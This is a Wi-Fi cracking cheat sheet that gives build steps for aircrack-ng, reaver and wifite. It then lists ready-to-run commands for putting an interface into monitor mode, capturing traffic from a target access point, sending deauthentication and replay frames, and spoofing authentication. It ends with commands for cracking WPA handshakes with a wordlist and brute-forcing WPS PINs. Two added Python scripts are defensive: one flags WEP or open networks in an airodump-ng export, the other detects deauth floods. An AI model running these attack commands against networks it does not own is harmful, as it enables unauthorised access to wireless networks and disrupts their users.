Cracking Wi-Fi
aircrack-ng
CentOS
$ sudo yum install "openssl-devel" "libnl3-devel" "iw" "ethtool" "pciutils" "tshark" "pyrit" "cowpatty"
Debian
$ sudo apt-get install "libssl-dev" "libnl-3-dev" "libnl-genl-3-dev" "iw" "ethtool" "tshark" "pyrit" "cowpatty"
http://aircrack-ng.org/
$ wget -c "http://download.aircrack-ng.org/aircrack-ng-1.2-rc3.tar.gz"
$ tar zxf "aircrack-ng-1.2-rc3.tar.gz"
$ cd "aircrack-ng-1.2-rc3"
$ make
$ sudo make install
$ cd ".."
$ sudo airodump-ng-oui-update
reaver
CentOS
$ sudo yum install "libpcap-devel" "sqlite-devel"
Debian
$ sudo apt-get install "libpcap-dev" "libsqlite3-dev"
https://code.google.com/p/reaver-wps/
$ wget -c "http://reaver-wps.googlecode.com/files/reaver-1.4.tar.gz"
$ tar zxf "reaver-1.4.tar.gz"
$ cd "reaver-1.4/src"
$ ./configure
$ make
$ sudo make install
$ cd "../.."
wifite
https://github.com/derv82/wifite/
$ wget -c "https://github.com/derv82/wifite/raw/master/wifite.py"
$ chmod +x "wifite.py"
$ sudo mv "wifite.py" "/usr/local/bin/wifite"
Scanning
Scan and show only APs with WPS enabled
$ wifite -wps
Scan only APs using WEP encryption
$ wifite -wep
Specify a wordlist file
$ wifite -dict "/root/w/china_super_wpa_wordlist.txt"
List wireless interfaces
$ airmon-ng
Put interface wlan0 into monitor mode
$ airmon-ng start wlan0
List nearby APs
$ airodump-ng mon0
Capture packets from one AP
$ airodump-ng -c CHANNEL --write ESSID --bssid BSSID mon0
$ airodump-ng -c CHANNEL --write ESSID --bssid BSSID mon0 --ivs
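From the defender's side, the same airodump-ng sweep is a site survey: its --write output includes a <prefix>-01.csv file listing every AP seen with its Privacy column. The script below is an added example, not part of the original cheat sheet or of aircrack-ng, that reads such a CSV and reports APs advertising WEP or no encryption (OPN). The CSV content is constructed here; the column names follow the header airodump-ng writes, so check the header of your own export if your version differs. MAC addresses are locally administered placeholders.

```python
"""Audit an airodump-ng CSV export for access points using weak or no encryption.

Added example (not part of the original cheat sheet). The sample CSV below is
constructed; the column names follow the header airodump-ng writes to its
<prefix>-01.csv file. Check the header of your own export if your version differs.
"""
import csv

# Constructed sample: one WEP AP, one open AP, one WPA2 AP, then the station
# table that airodump-ng appends after a blank line. MACs are placeholders.
SAMPLE_CSV = """\
BSSID, First time seen, Last time seen, channel, Speed, Privacy, Cipher, Authentication, Power, # beacons, # IV, LAN IP, ID-length, ESSID, Key
02:00:00:00:00:01, 2015-01-01 12:00:00, 2015-01-01 12:05:00,  6,  54, WEP, WEP, , -40,  100,  12,   0.  0.  0.  0,   7, old-dvr,
02:00:00:00:00:02, 2015-01-01 12:00:00, 2015-01-01 12:05:00, 11,  54, OPN, , , -55,   80,   0,   0.  0.  0.  0,   5, guest,
02:00:00:00:00:03, 2015-01-01 12:00:00, 2015-01-01 12:05:00,  1,  54, WPA2, CCMP, PSK, -60,   90,   0,   0.  0.  0.  0,   9, corp-wifi,

Station MAC, First time seen, Last time seen, Power, # packets, BSSID, Probed ESSIDs
02:00:00:00:00:aa, 2015-01-01 12:00:00, 2015-01-01 12:05:00, -50,   20, 02:00:00:00:00:03, corp-wifi
"""

# Privacy values that should not appear on a managed network
WEAK_PRIVACY = {"WEP", "OPN"}


def parse_ap_section(text):
    """Yield one dict per AP row, keyed by header name.

    The AP table ends at the first blank line; the station table after it is ignored.
    """
    ap_lines = []
    for line in text.splitlines():
        if not line.strip():
            break
        ap_lines.append(line)
    reader = csv.reader(ap_lines, skipinitialspace=True)
    header = [h.strip() for h in next(reader)]
    for row in reader:
        if len(row) < len(header):
            continue  # skip truncated rows rather than misalign columns
        yield {h: v.strip() for h, v in zip(header, row)}


def weak_access_points(text, weak=WEAK_PRIVACY):
    """Return [(bssid, essid, privacy)] for APs whose Privacy field names a weak scheme.

    Privacy can hold several space-separated tokens (e.g. 'WPA2 WPA'), so the
    check matches on tokens instead of the whole string.
    """
    findings = []
    for ap in parse_ap_section(text):
        if set(ap["Privacy"].split()) & weak:
            findings.append((ap["BSSID"], ap["ESSID"], ap["Privacy"]))
    return findings


if __name__ == "__main__":
    for bssid, essid, priv in weak_access_points(SAMPLE_CSV):
        print(f"{bssid}  {essid!r:14} {priv}")
```

Run it against a real export by replacing SAMPLE_CSV with the file's contents; anything it lists is an AP that either needs reconfiguring or is not yours and belongs in a rogue-AP ticket.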
Attacking
Send deauth frames
$ aireplay-ng -0 5 -a BSSID -c CLIENT_MAC mon0
$ aireplay-ng -3 -a BSSID -c CLIENT_MAC mon0
IV spoofing (fake authentication, then replay)
$ aireplay-ng -c 6 -1 0 -a "00:21:27:22:4c:2e" -h "00:1a:ef:0a:8e:bc" mon0
$ aireplay-ng -c 6 -2 -F -p 0841 -c "ff:ff:ff:ff:ff:ff" -b "00:21:27:22:4C:2E" -h "00:1a:ef:0a:8e:bc" mon0
aireplay-ng attack modes (from the tool's help output)
Attack modes (numbers can still be used):
--deauth count : deauthenticate 1 or all stations (-0)
--fakeauth delay : fake authentication with AP (-1)
--interactive : interactive frame selection (-2)
--arpreplay : standard ARP-request replay (-3)
--chopchop : decrypt/chopchop WEP packet (-4)
--fragment : generates valid keystream (-5)
--caffe-latte : query a client for new IVs (-6)
--cfrag : fragments against a client (-7)
--migmode : attacks WPA migration mode (-8)
--test : tests injection and quality (-9)
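The deauth attack above (-0) works by transmitting a burst of 802.11 deauthentication frames with the AP's BSSID as the source, usually to the broadcast address. That burst is easy to spot in a monitor-mode capture, because a healthy AP sends deauths rarely. The script below is an added example, not part of the original cheat sheet or of aircrack-ng, that parses raw management-frame headers and flags any BSSID whose deauth rate exceeds a threshold inside a sliding one-second window. The capture it analyses is constructed in sample_capture() with locally administered placeholder MACs; in practice the frames would come from a pcap of the monitor interface.

```python
"""Detect deauthentication floods in captured 802.11 management frames.

Added example (not part of the original cheat sheet). Frames are parsed from the
raw 24-byte MAC header; the sample capture is constructed in sample_capture()
and uses locally administered placeholder MACs.
"""
import struct
from collections import defaultdict

MGMT_TYPE = 0x0          # frame control type field: management
DEAUTH_SUBTYPE = 0xC     # management subtype: deauthentication
DISASSOC_SUBTYPE = 0xA   # management subtype: disassociation


def mac_bytes(mac):
    return bytes(int(x, 16) for x in mac.split(":"))


def mac_str(raw):
    return ":".join(f"{b:02x}" for b in raw)


def parse_frame(frame):
    """Return (ftype, subtype, addr1, addr2, addr3, reason) from an 802.11 frame.

    For management frames addr1 is the receiver, addr2 the transmitter and
    addr3 the BSSID. reason is the 16-bit reason code for deauth/disassoc
    frames and None otherwise.
    """
    if len(frame) < 24:
        raise ValueError("frame shorter than the 24-byte 802.11 MAC header")
    fc0 = frame[0]
    ftype = (fc0 >> 2) & 0x3
    subtype = (fc0 >> 4) & 0xF
    addr1, addr2, addr3 = frame[4:10], frame[10:16], frame[16:22]
    reason = None
    if ftype == MGMT_TYPE and subtype in (DEAUTH_SUBTYPE, DISASSOC_SUBTYPE) and len(frame) >= 26:
        reason = struct.unpack_from("<H", frame, 24)[0]
    return ftype, subtype, mac_str(addr1), mac_str(addr2), mac_str(addr3), reason


def build_frame(subtype, addr1, addr2, bssid, seq, reason=None):
    """Build a minimal management frame for test data (no FCS, no radiotap header)."""
    fc = bytes([(subtype << 4) | (MGMT_TYPE << 2), 0x00])
    duration = struct.pack("<H", 0x013A)
    hdr = fc + duration + mac_bytes(addr1) + mac_bytes(addr2) + mac_bytes(bssid)
    hdr += struct.pack("<H", (seq & 0xFFF) << 4)  # sequence number sits in the upper 12 bits
    if reason is not None:
        hdr += struct.pack("<H", reason)
    return hdr


def deauth_flood_alerts(frames, threshold=10, window=1.0):
    """frames: iterable of (timestamp_seconds, raw_frame).

    Returns {bssid: peak}, where peak is the largest number of deauth frames
    attributed to that BSSID inside any sliding window of `window` seconds,
    for every BSSID whose peak reaches `threshold`.
    """
    times_by_bssid = defaultdict(list)
    for ts, raw in frames:
        ftype, subtype, _a1, _a2, bssid, _reason = parse_frame(raw)
        if ftype == MGMT_TYPE and subtype == DEAUTH_SUBTYPE:
            times_by_bssid[bssid].append(ts)
    alerts = {}
    for bssid, times in times_by_bssid.items():
        times.sort()
        start, peak = 0, 0
        for end, t in enumerate(times):
            while t - times[start] > window:
                start += 1
            peak = max(peak, end - start + 1)
        if peak >= threshold:
            alerts[bssid] = peak
    return alerts


def sample_capture():
    """Constructed capture: a quiet AP with two routine deauths, and a flooded AP."""
    quiet_ap, busy_ap = "02:00:00:00:00:01", "02:00:00:00:00:02"
    client = "02:00:00:00:00:aa"
    broadcast = "ff:ff:ff:ff:ff:ff"
    frames = [
        (0.0, build_frame(DEAUTH_SUBTYPE, client, quiet_ap, quiet_ap, 1, reason=3)),
        (30.0, build_frame(DEAUTH_SUBTYPE, client, quiet_ap, quiet_ap, 2, reason=3)),
    ]
    # 25 broadcast deauths in 0.25 s, far above what an AP sends in normal operation
    frames += [
        (10.0 + i * 0.01, build_frame(DEAUTH_SUBTYPE, broadcast, busy_ap, busy_ap, 100 + i, reason=7))
        for i in range(25)
    ]
    return frames


if __name__ == "__main__":
    for bssid, peak in deauth_flood_alerts(sample_capture()).items():
        print(f"deauth flood from {bssid}: {peak} frames within 1 s")
```

The threshold and window are the tuning knobs: ten deauths per second per BSSID is well above normal AP behaviour but low enough to catch a short -0 burst. A spoofed source address cannot be distinguished from the real AP at this layer, which is exactly why 802.11w (protected management frames) exists; where the AP and clients support it, enabling it removes the attack rather than just detecting it.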
Cracking
Dictionary attack on a captured WPA handshake
$ aircrack-ng -w WORDLIST -b BSSID -e ESSID HANDSHAKE
WPS PIN brute force
$ reaver -i mon0 -b BSSID -c CHANNEL -v -S -a -d 0 -t 10 -s /media/VM/crack/ESSID.wpc -p PIN
WPA handshake dictionary attack (Windows build under Cygwin)
"D:\aircrack-ng\bin\aircrack-ng.exe" -w "/cygdrive/h/Temp/Crack/w/china_super_wpa_wordlist.txt" -e "ESSID" -b "BSSID" "/cygdrive/h/Temp/Crack/cap/ESSID.cap"